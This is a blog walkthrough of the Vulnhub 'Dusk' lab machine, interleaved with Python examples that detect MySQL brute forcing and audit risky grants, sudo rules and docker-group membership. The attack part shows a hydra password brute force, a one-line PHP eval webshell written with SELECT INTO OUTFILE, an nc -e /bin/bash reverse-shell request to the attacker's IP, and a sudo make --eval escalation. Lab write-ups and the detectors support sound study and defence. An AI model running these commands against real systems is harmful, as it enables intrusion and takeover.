Vulnhub: Dusk target machine walkthrough

Dusk

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:02:3b:33      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.208  08:00:27:b6:83:b3      1      60  PCS Systemtechnik GmbH      

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.208.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.208 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-12 08:51 EST
Nmap scan report for 192.168.56.208
Host is up (0.00026s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     pyftpdlib 1.5.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.208:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 b5ff692a03fd6d04ed2a06aabfb26a7c (RSA)
|   256 0b6f20d67c6c84bed8406169a2c6e88a (ECDSA)
|_  256 85ff47d99250cbf7446cb4f45ce91ced (ED25519)
25/tcp   open  smtp    Postfix smtpd
|_smtp-commands: dusk.dusk, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
| ssl-cert: Subject: commonName=dusk.dusk
| Subject Alternative Name: DNS:dusk.dusk
| Not valid before: 2019-11-27T21:09:14
|_Not valid after:  2029-11-24T21:09:14
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
3306/tcp open  mysql   MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.18-MariaDB-0+deb10u1
|   Thread ID: 37
|   Capabilities flags: 63486
|   Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, FoundRows, Support41Auth, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, SupportsCompression, IgnoreSigpipes, ConnectWithDatabase, LongColumnFlag, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: \F'/U@~}xbcL/EP?.d1e
|_  Auth Plugin Name: mysql_native_password
8080/tcp open  http    PHP cli server 5.5 or later (PHP 7.3.11-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:B6:83:B3 (Oracle VirtualBox virtual NIC)
Service Info: Host:  dusk.dusk; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.87 seconds

Getting a shell

Port 3306

Check for weak credentials

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: NO)

Port 21

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ ftp 192.168.56.208
Connected to 192.168.56.208.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.208:kali): anonymous
331 Username ok, send password.
Password: 
530 Anonymous access not allowed.
ftp: Login failed
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ searchsploit pyftpdlib 1.5.5                               
Exploits: No Results
Shellcodes: No Results

  1. Anonymous access is not allowed

  2. No exploitable vulnerability is known for this version of the FTP server software

Port 80

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ nikto -h http://192.168.56.208
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.208
+ Target Hostname:    192.168.56.208
+ Target Port:        80
+ Start Time:         2023-01-12 08:56:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 598295a712980, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-01-12 08:56:48 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 

                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.208
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/12 08:58:00 Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.208/javascript/]
/server-status        (Status: 403) [Size: 279]
Progress: 219400 / 220561 (99.47%)===============================================================
2023/01/12 08:58:26 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.208
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,txt,sh,js
[+] Timeout:                 10s
===============================================================
2023/01/12 08:59:49 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.208/javascript/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1321074 / 1323366 (99.83%)===============================================================
2023/01/12 09:02:36 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ dirb http://192.168.56.208

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jan 12 09:03:27 2023
URL_BASE: http://192.168.56.208/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.208/ ----
+ http://192.168.56.208/index.html (CODE:200|SIZE:10701)                                                                    
==> DIRECTORY: http://192.168.56.208/javascript/                                                                            
+ http://192.168.56.208/server-status (CODE:403|SIZE:279)                                                                   
                                                                                                                            
---- Entering directory: http://192.168.56.208/javascript/ ----
==> DIRECTORY: http://192.168.56.208/javascript/jquery/                                                                     
                                                                                                                            
---- Entering directory: http://192.168.56.208/javascript/jquery/ ----
+ http://192.168.56.208/javascript/jquery/jquery (CODE:200|SIZE:271809)                                                     
                                                                                                                            
-----------------
END_TIME: Thu Jan 12 09:03:31 2023
DOWNLOADED: 13836 - FOUND: 3

The scans turned up nothing of value.

Port 8080

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ nikto -h http://192.168.56.208:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.208
+ Target Hostname:    192.168.56.208
+ Target Port:        8080
+ Start Time:         2023-01-12 09:04:02 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ Retrieved x-powered-by header: PHP/7.3.11-1~deb10u1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF:  Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-01-12 09:04:15 (GMT-5) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.208:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,js,php
[+] Timeout:                 10s
===============================================================
2023/01/12 09:06:32 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.208:8080/9017c201-9961-4795-ad75-f9c8e97668ec => 200 (Length: 257). To continue please exclude the status code or the length
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js --exclue-length 257
Error: unknown flag: --exclue-length
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ gobuster dir -u http://192.168.56.208:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js --exclude-length 257
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.208:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          257
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,js,php
[+] Timeout:                 10s
===============================================================
2023/01/12 09:06:48 Starting gobuster in directory enumeration mode
===============================================================
/21540                (Status: 200) [Size: 340]
/head_02              (Status: 200) [Size: 340]
/PublicEducation      (Status: 200) [Size: 340]
/play-poker           (Status: 200) [Size: 340]
Progress: 1322766 / 1323366 (99.95%)===============================================================
2023/01/12 09:19:12 Finished
===============================================================

Looking at other people's write-ups, the way in is to brute-force the MySQL password (a little unexpected, haha)

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.56.208
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-12 09:20:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.56.208:3306/
[3306][mysql] host: 192.168.56.208   login: root   password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-12 09:20:28

So MySQL does have a weak password after all; in the earlier weak-credential attempts only the empty password and "root" were tried, and "password" should have been tried as well.
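From the defender's side, the three-second hydra run above is exactly the pattern a database server should raise an alarm on. The following is an added example (not from the original post) that parses the failed-login warnings MariaDB writes to its error log when log_warnings is 2 or higher and raises one alert per user/source pair once a sliding window fills up. The log lines are constructed for the example; the timestamp and thread-id layout is assumed to match a stock MariaDB 10.3 error log.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in the shape MariaDB writes to its error log for
# denied logins (date, time, thread id, level, message). Made up for this
# example; only the user/source pattern mirrors the page.
SAMPLE_ERROR_LOG = """\
2023-01-12 09:20:25 41 [Warning] Access denied for user 'root'@'192.168.56.206' (using password: YES)
2023-01-12 09:20:25 42 [Warning] Access denied for user 'root'@'192.168.56.206' (using password: YES)
2023-01-12 09:20:25 43 [Warning] Access denied for user 'root'@'192.168.56.206' (using password: NO)
2023-01-12 09:20:26 44 [Warning] Access denied for user 'root'@'192.168.56.206' (using password: YES)
2023-01-12 09:20:26 45 [Warning] Access denied for user 'root'@'192.168.56.206' (using password: YES)
2023-01-12 09:20:26 46 [Warning] Access denied for user 'root'@'192.168.56.206' (using password: YES)
2023-01-12 09:20:27 47 [Note] InnoDB: Buffer pool(s) load completed at 230112  9:20:27
2023-01-12 09:25:00 48 [Warning] Access denied for user 'admin'@'192.168.56.1' (using password: YES)
2023-01-12 09:25:01 49 [Warning] Access denied for user 'root'@'192.168.56.206' (using password: YES)
"""

DENIED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) +\d+ \[Warning\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: (?P<pw>YES|NO)\)"
)


def parse_failed_logins(text):
    """Return (timestamp, user, source_host, used_password) for each denied login."""
    events = []
    for line in text.splitlines():
        m = DENIED_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["user"], m["host"], m["pw"] == "YES"))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window count per (user, source). Emits one alert at the moment a
    source reaches `threshold` failures inside `window`; attempts older than the
    window are dropped, so a lone failure minutes later does not re-alert."""
    recent = defaultdict(deque)
    alerts = []
    for ts, user, host, _ in sorted(events):
        q = recent[(user, host)]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) == threshold:
            alerts.append((user, host, ts, len(q)))
    return alerts


if __name__ == "__main__":
    for user, host, ts, n in detect_bruteforce(parse_failed_logins(SAMPLE_ERROR_LOG)):
        print(f"{ts} brute-force suspected: {n} failures for {user!r} from {host}")
```

With the sample above, the burst from 192.168.56.206 triggers on the fifth failure at 09:20:26; the single failure from 192.168.56.1 and the later isolated one do not. On the server side, the weak password itself is the root cause: hydra found "password" on the first few tries, so rate limiting only buys time.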

Since visiting the page on port 8080 shows that its current directory is /var/tmp,

http://192.168.56.208:8080/

a one-line PHP webshell can be written there:

┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ mysql -uroot -p -h 192.168.56.208
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 55
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> select "<?php eval($_GET['cmd']);?>" into outfile "/var/tmp/1.php";
Query OK, 1 row affected (0.000 sec)

MariaDB [(none)]> 
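The write above only works because three things line up: the account holds the global FILE privilege, secure_file_priv is empty (so INTO OUTFILE may write to any directory mysqld can), and the directory it lands in is served by the PHP built-in server. The following is an added audit example (not part of the original post) that reads SHOW GRANTS lines and the secure_file_priv value and reports which accounts can drop files into a served directory. The grant lines and the served-directory list are constructed for the example.

```python
import re
from pathlib import PurePosixPath

# Constructed SHOW GRANTS output for three accounts (not taken from the target).
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION",
    "GRANT SELECT, INSERT, UPDATE ON `app`.* TO 'app'@'localhost'",
    "GRANT FILE ON *.* TO 'backup'@'localhost'",
]

GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO '(?P<user>[^']*)'@'(?P<host>[^']*)'", re.I
)


def file_privileged_accounts(grant_lines):
    """Accounts able to use INTO OUTFILE. FILE is a global privilege, so it only
    comes from a grant on *.* (explicitly, or bundled in ALL PRIVILEGES)."""
    found = []
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m["scope"] != "*.*":
            continue
        privs = {p.strip().upper() for p in m["privs"].split(",")}
        if "ALL PRIVILEGES" in privs or "FILE" in privs:
            found.append((m["user"], m["host"]))
    return found


def _overlaps(a, b):
    """True if either path is the other or lies underneath it."""
    a, b = PurePosixPath(a), PurePosixPath(b)
    return a == b or a in b.parents or b in a.parents


def outfile_exposure(secure_file_priv, grant_lines, served_dirs):
    """Return (account, severity, reason) findings.
    secure_file_priv: None or "NULL" means the feature is disabled, "" means
    unrestricted, any other value is the only directory INTO OUTFILE may use."""
    findings = []
    disabled = secure_file_priv is None or str(secure_file_priv).upper() == "NULL"
    for user, host in file_privileged_accounts(grant_lines):
        acct = f"{user}@{host}"
        if disabled:
            findings.append((acct, "info", "holds FILE, but secure_file_priv=NULL disables INTO OUTFILE"))
        elif secure_file_priv == "":
            findings.append((acct, "high", "secure_file_priv is empty: INTO OUTFILE can write anywhere "
                             "mysqld can, including served dirs " + ", ".join(served_dirs)))
        else:
            hits = [d for d in served_dirs if _overlaps(d, secure_file_priv)]
            if hits:
                findings.append((acct, "high", f"secure_file_priv={secure_file_priv} overlaps "
                                 f"served dir(s) {', '.join(hits)}"))
            else:
                findings.append((acct, "medium", f"INTO OUTFILE confined to {secure_file_priv}; "
                                 "revoke FILE if the account does not need it"))
        if host == "%":
            findings.append((acct, "medium", "reachable from any host; a guessable password "
                             "exposes this privilege over the network"))
    return findings


if __name__ == "__main__":
    # Weak setup as on the page: empty secure_file_priv and /var/tmp served on 8080.
    for acct, sev, why in outfile_exposure("", SAMPLE_GRANTS, ["/var/tmp"]):
        print(f"[{sev}] {acct}: {why}")
```

The fix the audit points at is configuration, not code: set secure_file_priv to a dedicated directory that no web server reads (or to NULL if file import/export is not needed), do not let a root account with ALL PRIVILEGES listen on 0.0.0.0 with a dictionary password, and give application accounts database-scoped grants like the `app` account above, which the audit leaves alone.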

Request 1.php with the cmd parameter to establish a reverse shell

http://192.168.56.208:8080/1.php?cmd=system(%27nc%20-e%20/bin/bash%20192.168.56.206%205555%27);
┌──(kali㉿kali)-[~/Vulnhub/Dusk]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.208] 46350
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dusk:/var/tmp$ 

Privilege escalation

www-data@dusk:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on dusk:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on dusk:
    (dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
www-data@dusk:/home$ 

www-data@dusk:/home$ COMMAND='/bin/sh'
COMMAND='/bin/sh'
www-data@dusk:/home$ sudo -u dusk /usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
<u dusk /usr/bin/make -s --eval=$'x:\n\t-'"$COMMAND"
$ id
id
uid=1000(dusk) gid=1000(dusk) groups=1000(dusk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner),123(docker)
$ 

Successfully switched to the dusk user.

Then use docker to escalate to root.
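Both escalation steps on this box come from configuration that a host audit can flag before anyone lands a shell: a NOPASSWD sudo rule for a build tool that runs arbitrary commands from its own rules, and membership in the docker group, which Docker itself documents as root-equivalent. The following is an added example (not from the original post) that parses the `sudo -l` and `id` output shapes shown above and reports both. The input strings are constructed copies of the page's output; the set of shell-capable binaries contains only make, because that is the one demonstrated here.

```python
import re

# Constructed copies of the sudo -l and id output shown on the page.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on dusk:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on dusk:
    (dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
"""
SAMPLE_ID = ("uid=1000(dusk) gid=1000(dusk) groups=1000(dusk),24(cdrom),25(floppy),"
             "29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),"
             "115(lpadmin),116(scanner),123(docker)")

# Binaries known to execute caller-chosen commands when run under sudo.
# Only make is listed because it is the case demonstrated on this page;
# extend it from your own review of the target's rules.
SHELL_CAPABLE = {"make"}

# One sudo rule line: "(runas) TAG: /path/one, /path/two"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")
GROUPS_RE = re.compile(r"groups=(.*)$")
GROUP_NAME_RE = re.compile(r"\d+\((\w+)\)")


def audit_sudo_rules(sudo_l_output):
    """Return (source, subject, severity, reason) for every command in sudo -l."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            name = cmd.rsplit("/", 1)[-1]
            if cmd == "ALL":
                sev, why = "high", "unrestricted command set"
            elif name in SHELL_CAPABLE:
                sev, why = "high", "runs arbitrary commands from caller-supplied rules (make --eval)"
            else:
                sev, why = "info", "review for argument-driven side effects"
            if nopasswd:
                why += "; NOPASSWD removes the credential prompt"
            findings.append(("sudo", f"{m['runas']}:{cmd}", sev, why))
    return findings


def audit_groups(id_output):
    """Flag group memberships that are equivalent to root on the host."""
    m = GROUPS_RE.search(id_output)
    names = GROUP_NAME_RE.findall(m.group(1)) if m else []
    findings = []
    if "docker" in names:
        findings.append(("group", "docker", "high",
                         "docker group members control the daemon and can obtain root on the host"))
    return findings


def audit_host(sudo_l_output, id_output):
    return audit_sudo_rules(sudo_l_output) + audit_groups(id_output)


if __name__ == "__main__":
    for src, subject, sev, why in audit_host(SAMPLE_SUDO_L, SAMPLE_ID):
        print(f"[{sev}] {src} {subject}: {why}")
```

Run against the page's output, make and the docker group come back as high, ping and sl as informational. The remediation is to drop make from the www-data rule (a web service account has no business running a build tool as another user) and to take dusk out of the docker group, or treat that membership as granting root and protect the account accordingly.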

posted @ 2023-01-12 22:40  Jason_huawen